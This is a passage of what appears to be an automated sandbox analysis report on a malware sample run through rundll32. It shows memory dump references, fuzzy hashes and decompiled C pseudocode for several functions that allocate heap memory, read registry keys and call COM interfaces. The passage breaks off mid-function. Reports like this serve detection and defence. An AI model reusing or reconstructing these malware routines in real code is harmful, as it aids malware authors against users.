                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b76cf26add51fcdba24a6a8b26f1e1c6a24c4c93e708351846b0c302c7ced8e2
                                                  • Instruction ID: 21999aa7b902423880f76f466de5af323f43369731e6728134eadc5091b773c4
                                                  • Opcode Fuzzy Hash: b76cf26add51fcdba24a6a8b26f1e1c6a24c4c93e708351846b0c302c7ced8e2
                                                  • Instruction Fuzzy Hash: 40212F76200204EFEB51AF95DC84EDA37ACEB49354F00402AFA419B240FB75EEC59BE5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B924F, Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 982ae206d63e5696c4a8b46e76f0dd5af4ab124cc63f82c4546ae09c766349d8
                                                  • Instruction ID: 638cabaa3c93c2fedcb9811a04f5b9e15842a5c5d487197beedfb1f4e7b4a173
                                                  • Opcode Fuzzy Hash: 982ae206d63e5696c4a8b46e76f0dd5af4ab124cc63f82c4546ae09c766349d8
                                                  • Instruction Fuzzy Hash: 5E2141B5D0025DFFEB119F94DC84EEEBB79EB48304F000065EA50A62A1E7755E85DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B1B2F, Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4421bbb6c10063517416e6ae9fff2876a3e987f9368b7516d06aa1775ea86b35
                                                  • Instruction ID: 5a8a18d43779bbdace93b7c804424763469b0cc34435f302fb47579a088eaa47
                                                  • Opcode Fuzzy Hash: 4421bbb6c10063517416e6ae9fff2876a3e987f9368b7516d06aa1775ea86b35
                                                  • Instruction Fuzzy Hash: 9C210576640604BBD7219BA8CC05FDA37B8EB48740F144165F605EB280F6B1AA818BD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B3D0D, Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E046B3D0D(intOrPtr* _a4, void* _a8) {
				void _v31;
				char _v32;
				void* _t17;
				void* _t19;
				intOrPtr _t21;
				void* _t23;
				signed int _t25;
				signed int _t26;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t40;

				_t25 = 6;
				_v32 = 0;
				memset( &_v31, 0, _t25 << 2);
				_t26 = 0;
				asm("stosw");
				asm("stosb");
				_t31 = 0; // executed
				_t17 = E046B83B7( *0x46bd258,  &_v32); // executed
				if(_t17 != 0 && _v31 > 2) {
					_t23 = (_v31 & 0x000000ff) + 0xfffffffe;
					_t26 = 0;
					if(_t23 > 0) {
						do {
							_t31 = _t31 +  *((intOrPtr*)(_t32 + _t26 * 4 - 0x10));
							_t26 = _t26 + 1;
						} while (_t26 < _t23);
					}
				}
				_t39 = _t31;
				 *0x46bd270 = _t31;
				if(_t31 != 0) {
					L8:
					_t19 = E046B924F( &_a8); // executed
					__eflags = _t19;
					if(_t19 == 0) {
						__eflags = _a8 - 0x1000;
						if(_a8 == 0x1000) {
							goto L10;
						}
					}
				} else {
					_t21 = E046B7923(_t26, _t39);
					_t40 =  *0x46bd270; // 0xd448b889
					 *_a8 = _t21;
					if(_t40 != 0) {
						goto L8;
					} else {
						if(_t21 == 0) {
							L10:
							_push(5);
							_pop(0);
						} else {
							 *_a4 = 1;
							 *0x46bd270 = _t21;
						}
					}
				}
				return 0;
			}














                                                  0x046b3d18
                                                  0x046b3d1d
                                                  0x046b3d23
                                                  0x046b3d23
                                                  0x046b3d25
                                                  0x046b3d27
                                                  0x046b3d32
                                                  0x046b3d34
                                                  0x046b3d3b
                                                  0x046b3d47
                                                  0x046b3d4a
                                                  0x046b3d4e
                                                  0x046b3d50
                                                  0x046b3d50
                                                  0x046b3d54
                                                  0x046b3d55
                                                  0x046b3d50
                                                  0x046b3d4e
                                                  0x046b3d59
                                                  0x046b3d5b
                                                  0x046b3d61
                                                  0x046b3d89
                                                  0x046b3d8d
                                                  0x046b3d92
                                                  0x046b3d94
                                                  0x046b3d96
                                                  0x046b3d9d
                                                  0x00000000
                                                  0x00000000
                                                  0x046b3d9d
                                                  0x046b3d63
                                                  0x046b3d63
                                                  0x046b3d68
                                                  0x046b3d71
                                                  0x046b3d73
                                                  0x00000000
                                                  0x046b3d75
                                                  0x046b3d77
                                                  0x046b3d9f
                                                  0x046b3d9f
                                                  0x046b3da1
                                                  0x046b3d79
                                                  0x046b3d7c
                                                  0x046b3d82
                                                  0x046b3d82
                                                  0x046b3d77
                                                  0x046b3d73
                                                  0x046b3da8

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b8e523e8e8101765705de908528e290821a0ddb7757764030301cb4acbc0cb3
                                                  • Instruction ID: a09d94f070e06581b29c19605a94e09cb550b48e340f35ab5854eda4305426c6
                                                  • Opcode Fuzzy Hash: 1b8e523e8e8101765705de908528e290821a0ddb7757764030301cb4acbc0cb3
                                                  • Instruction Fuzzy Hash: F611C171A00244AEEF209EB988407EE7BA8EB54358F11453FDE90DA380F674E5C98BD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B6A56, Relevance: .1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E046B6A56(intOrPtr __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
				unsigned int _v24;
				signed int _v28;
				void* _t11;
				unsigned int* _t12;
				signed int _t14;
				void* _t16;
				signed int _t17;
				unsigned int _t21;
				signed int _t24;
				void* _t25;
				void* _t28;
				signed int _t31;

				_t24 = __edx;
				__imp__(0, 0x400000, 0, _t25, _t28, __ecx, __ecx); // executed
				 *0x46bd238 = __eax;
				if(__eax != 0) {
					__imp__();
					 *0x46bd1a8 = __eax;
					_t11 = E046B8F10(__eax, _a4);
					if(_t11 == 0) {
						do {
							_t12 =  &_v24;
							__imp__(_t12);
							__imp__();
							_t21 = _v24;
							_t14 = (_t21 << 0x00000020 | _v28) >> 7;
							L046BB226();
							_t31 = _t12 + _t14;
							_t16 = E046B7E03(_a4, _t31);
							_t17 = 2;
							_t23 = _t31;
							__imp__(_t17 << _t31, _t14, _t21 >> 7, 9, 0); // executed
						} while (_t16 == 1);
						if(E046B6B96(_t23) != 0) {
							 *0x46bd260 = 1; // executed
						}
						_t11 = E046B225B(_t24); // executed
					}
				} else {
					_t11 = 8;
				}
				return _t11;
			}















                                                  0x046b6a56
                                                  0x046b6a69
                                                  0x046b6a71
                                                  0x046b6a76
                                                  0x046b6a7d
                                                  0x046b6a86
                                                  0x046b6a8b
                                                  0x046b6a92
                                                  0x046b6a94
                                                  0x046b6a94
                                                  0x046b6a99
                                                  0x046b6a9f
                                                  0x046b6aa5
                                                  0x046b6aaf
                                                  0x046b6abc
                                                  0x046b6ac1
                                                  0x046b6ac7
                                                  0x046b6ad0
                                                  0x046b6ad1
                                                  0x046b6ad6
                                                  0x046b6adc
                                                  0x046b6ae8
                                                  0x046b6aea
                                                  0x046b6aea
                                                  0x046b6af4
                                                  0x046b6af4
                                                  0x046b6a78
                                                  0x046b6a7a
                                                  0x046b6a7a
                                                  0x046b6afe

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 727c66b4140e4909872ff4fe489ace9ef1eefc904ebd9c579e67a3c0010230a9
                                                  • Instruction ID: cf9b3edc6e0f3b5325556711f7e4175d13cea74e96a4343e706055ebff669176
                                                  • Opcode Fuzzy Hash: 727c66b4140e4909872ff4fe489ace9ef1eefc904ebd9c579e67a3c0010230a9
                                                  • Instruction Fuzzy Hash: 0E11C2726002006FE724AB64DC59BAA3698DB44754F00452CFA84CA280FAB5F9D087E6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B94A9, Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 544d6a92c0ae096eb4745d134e66f1c2e39bb4bea8d57131c291256e9e0cb209
                                                  • Instruction ID: f5795c8fd41e0d2dd2a9856436351f431b43f78a682adc4e726aad90cf961300
                                                  • Opcode Fuzzy Hash: 544d6a92c0ae096eb4745d134e66f1c2e39bb4bea8d57131c291256e9e0cb209
                                                  • Instruction Fuzzy Hash: E30192B26453215FD3209E698C49E6B7F98EB96790F111518F981D7340FA64DC4587E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B21CD, Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 32%
                                                  			E046B21CD(void* __ecx, signed char* _a4) {
				char _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t18;
				signed short* _t21;
				void* _t23;
				intOrPtr* _t26;

				_t23 = 0;
				_push(0);
				_t18 = 1;
				_t26 = 0x46bd330;
				E046B84D5();
				while(1) {
					_t8 = E046B12D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E046B809F(_t14);
					if(_t15 == 0) {
						__imp__( *0x46bd238, 0, _v8);
						break;
					} else {
						 *_t26 = _t15;
						_t26 = _t26 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E046B84D5();
					if(_t18 != 0) {
						_t21 =  *0x46bd338; // 0x5029b70
						_t11 =  *_t21 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t21 = _t12;
					}
					return _t18;
				}
				_t18 = 0;
				goto L7;
			}













                                                  0x046b21d5
                                                  0x046b21d9
                                                  0x046b21da
                                                  0x046b21db
                                                  0x046b21e0
                                                  0x046b21e5
                                                  0x046b21ec
                                                  0x046b21f3
                                                  0x00000000
                                                  0x00000000
                                                  0x046b21f5
                                                  0x046b21fa
                                                  0x046b21fb
                                                  0x046b2202
                                                  0x046b221c
                                                  0x00000000
                                                  0x046b2204
                                                  0x046b2204
                                                  0x046b2206
                                                  0x046b2209
                                                  0x046b220d
                                                  0x00000000
                                                  0x00000000
                                                  0x046b220f
                                                  0x046b220d
                                                  0x046b2224
                                                  0x046b2224
                                                  0x046b2226
                                                  0x046b222d
                                                  0x046b222f
                                                  0x046b2235
                                                  0x046b223c
                                                  0x046b224c
                                                  0x046b2244
                                                  0x046b2247
                                                  0x046b2247
                                                  0x046b224f
                                                  0x046b224f
                                                  0x046b2258
                                                  0x046b2258
                                                  0x046b2222
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 58aefad1ecb49e1da6817f010915a724ae3c74426a7f6f84e7e0685d8e48165d
                                                  • Instruction ID: d70f0a1cc44f88928e0d23c1d9c456eb2aa74ae7cb784894903062d9482e9a9c
                                                  • Opcode Fuzzy Hash: 58aefad1ecb49e1da6817f010915a724ae3c74426a7f6f84e7e0685d8e48165d
                                                  • Instruction Fuzzy Hash: 6A01F535210204AAF7106EEACC88BEA72D9EB55364F40047AAAC4CB250F679FCC193E4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046BA72D, Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E046BA72D(intOrPtr _a4, intOrPtr* _a8) {
				void* _t9;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr* _t17;
				intOrPtr* _t19;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr* _t28;

				_t28 = E046B2049(_t9, 8);
				if(_t28 == 0) {
					_t11 = 8;
					return _t11;
				}
				_t12 =  *0x46bd27c; // 0x96a5a8
				_t2 = _t12 + 0x46be1bc; // 0x6f0072
				_t14 = E046B7B5D(_t2, _a4, _t28); // executed
				_t27 = _t14;
				if(_t27 < 0) {
					L6:
					E046B9039(_t14, _t28);
					return _t27;
				}
				_t17 =  *_t28;
				_t3 = _t28 + 4; // 0x4
				_t25 =  *0x46bd27c; // 0x96a5a8
				_t4 = _t25 + 0x46be1fc; // 0x740053
				_t27 =  *((intOrPtr*)( *_t17 + 0x18))(_t17, _t4, 0, 0, _t3, 0);
				if(_t27 < 0) {
					_t19 =  *_t28;
					 *((intOrPtr*)( *_t19 + 8))(_t19);
					_t14 = _a4;
				} else {
					_t14 = 0;
					 *_a8 = _t28;
				}
				if(_t27 < 0) {
					goto L6;
				}
				return _t14;
			}












                                                  0x046ba739
                                                  0x046ba73d
                                                  0x046ba7a3
                                                  0x00000000
                                                  0x046ba7a3
                                                  0x046ba73f
                                                  0x046ba748
                                                  0x046ba74f
                                                  0x046ba754
                                                  0x046ba758
                                                  0x046ba797
                                                  0x046ba798
                                                  0x00000000
                                                  0x046ba79d
                                                  0x046ba75a
                                                  0x046ba760
                                                  0x046ba764
                                                  0x046ba76e
                                                  0x046ba779
                                                  0x046ba77d
                                                  0x046ba788
                                                  0x046ba78d
                                                  0x046ba790
                                                  0x046ba77f
                                                  0x046ba782
                                                  0x046ba784
                                                  0x046ba784
                                                  0x046ba795
                                                  0x00000000
                                                  0x00000000
                                                  0x046ba7a7

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbbd3d70b1df411ca02779265c1cb52c391f49bc40b333c89661ec08e14234ed
                                                  • Instruction ID: 6c04ec7ce3876abd3cee76b9ae9abcbe61b02b1d9bf0c7b3254a0c45271f8e62
                                                  • Opcode Fuzzy Hash: dbbd3d70b1df411ca02779265c1cb52c391f49bc40b333c89661ec08e14234ed
                                                  • Instruction Fuzzy Hash: FC01A539204604ABD711CAA4C844F9677B9EFC9754F208429FA488F340FA76E881C7D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B9318, Relevance: .0, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 34%
                                                  			E046B9318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x46bd27c; // 0x96a5a8
				_t4 = _t15 + 0x46be39c; // 0x5028944
				_t20 = _t4;
				_t6 = _t15 + 0x46be124; // 0x650047
				_t17 = E046B9152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E046B9FC9(_t17, _t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                  0x046b9322
                                                  0x046b9324
                                                  0x046b932b
                                                  0x046b932c
                                                  0x046b932d
                                                  0x046b932e
                                                  0x046b9334
                                                  0x046b9339
                                                  0x046b9339
                                                  0x046b9343
                                                  0x046b9355
                                                  0x046b935c
                                                  0x046b938b
                                                  0x046b935e
                                                  0x046b9363
                                                  0x046b9388
                                                  0x046b9365
                                                  0x046b9368
                                                  0x046b936f
                                                  0x046b937a
                                                  0x046b9371
                                                  0x046b9374
                                                  0x046b9374
                                                  0x046b937e
                                                  0x046b937e
                                                  0x046b9363
                                                  0x046b9392

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14d836b4b8dd377c1d5d5fc7a9606326bf12c4e3a938d25fe58a78582854128f
                                                  • Instruction ID: 2c1ca6d8c4d8da2f23ec536812fb953f860387dde993c024f5e7ce250403b269
                                                  • Opcode Fuzzy Hash: 14d836b4b8dd377c1d5d5fc7a9606326bf12c4e3a938d25fe58a78582854128f
                                                  • Instruction Fuzzy Hash: E6019E72500219BBDB119FA8CC44CEEBBB8EB44710B004825EA51E62A0F371A99997E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B89D6, Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 41%
                                                  			E046B89D6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				char _v12;
				void* _t15;
				void* _t20;
				void* _t23;
				signed short* _t24;

				_t23 = E046B809F(0, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E046B904E(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						__imp__( &_v12);
						_push( &_v12);
						 *_t24 = 0x5f;
						_t20 = E046BA635(__edx, 8, _a4, 0x80000001, _a8, _t23);
					}
					__imp__( *0x46bd238, 0, _t23);
				}
				return _t20;
			}








                                                  0x046b89e9
                                                  0x046b89ed
                                                  0x046b8a47
                                                  0x046b89ef
                                                  0x046b89f6
                                                  0x046b89fc
                                                  0x046b8a00
                                                  0x046b8a05
                                                  0x046b8a09
                                                  0x046b8a0f
                                                  0x046b8a18
                                                  0x046b8a1d
                                                  0x046b8a32
                                                  0x046b8a32
                                                  0x046b8a3d
                                                  0x046b8a3d
                                                  0x046b8a4e

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d21cb9b1835f8eb062935d8be2aba94d833a25df110c6177420e9b17741d6d1
                                                  • Instruction ID: 30283cbef0f0d0210b9e02655c643c4f2d87f15e4fd069daf0ab1750e311217f
                                                  • Opcode Fuzzy Hash: 2d21cb9b1835f8eb062935d8be2aba94d833a25df110c6177420e9b17741d6d1
                                                  • Instruction Fuzzy Hash: CB017132200609BADF216FA49C44EDA7BBDEF84314F004429FA809B151FB75E9958790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B1262, Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E046B1262(intOrPtr* __esi, intOrPtr _a4, unsigned int _a8, char _a12) {
				signed short _t18;
				intOrPtr _t23;
				signed int _t25;
				signed short _t26;

				if(_a4 != 0) {
					_t18 = E046B9318(_a4, _a8, _a12, __esi); // executed
					_t26 = _t18;
				} else {
					_t26 = E046B6BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t25 = _a8 >> 1;
						if(_t25 == 0) {
							_t26 = 2;
							__imp__( *0x46bd238, 0, _a12);
						} else {
							_t23 = _a12;
							 *(_t23 + _t25 * 2 - 2) =  *(_t23 + _t25 * 2 - 2) & _t26;
							 *__esi = _t23;
						}
					}
				}
				return _t26;
			}







                                                  0x046b126a
                                                  0x046b12bf
                                                  0x046b12c4
                                                  0x046b126c
                                                  0x046b1286
                                                  0x046b128a
                                                  0x046b128f
                                                  0x046b1291
                                                  0x046b12a1
                                                  0x046b12ad
                                                  0x046b1293
                                                  0x046b1293
                                                  0x046b1296
                                                  0x046b129b
                                                  0x046b129b
                                                  0x046b1291
                                                  0x046b128a
                                                  0x046b12ca

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 447fbbfea3219997d769c046bf4a817c5b91f1ae33e6234bc9fc58fbc221a90f
                                                  • Instruction ID: 4fdfe8fb69aaba3f6f6858d9903bb3718cf3275fd82dc6e7a1065371290ad673
                                                  • Opcode Fuzzy Hash: 447fbbfea3219997d769c046bf4a817c5b91f1ae33e6234bc9fc58fbc221a90f
                                                  • Instruction Fuzzy Hash: CB011236100249FBDB119F44CC11FEA3BB5EB553A0F148429FB559A260E731E5A1D790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B54BC, Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E046B54BC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__; // 0x75144a00
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E046B2049(_t10 + 1, _t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E046B9039(_t15, _t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                  0x046b54c1
                                                  0x046b54cc
                                                  0x046b54ce
                                                  0x046b54d4
                                                  0x046b54d6
                                                  0x046b54db
                                                  0x046b54e4
                                                  0x046b54e8
                                                  0x046b54f1
                                                  0x046b54f5
                                                  0x046b5504
                                                  0x046b54f7
                                                  0x046b54f8
                                                  0x046b54fd
                                                  0x046b54fd
                                                  0x046b54f5
                                                  0x046b54e8
                                                  0x046b550d

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de3d47e7a0645f0bb13fd8d85002cf0189a88631fe26ed6b8a68134be3098341
                                                  • Instruction ID: 1aaf550f3c7e315896ebcd60bb488b7e17fbb13de87bed96170bbfb1cf3d63bf
                                                  • Opcode Fuzzy Hash: de3d47e7a0645f0bb13fd8d85002cf0189a88631fe26ed6b8a68134be3098341
                                                  • Instruction Fuzzy Hash: F9F0BE23600109BAEB10D6AA8C00EEF37FEDBC5649F14406AA941D3200FA70EF4287F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B96A4, Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E046B96A4(void* __ecx) {
				signed int _v8;
				char _v12;
				void* _t10;
				void* _t12;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;

				_t10 =  *0x46bd270; // 0xd448b889
				_v8 = _t10;
				_v12 = _t10;
				_t23 = 0; // executed
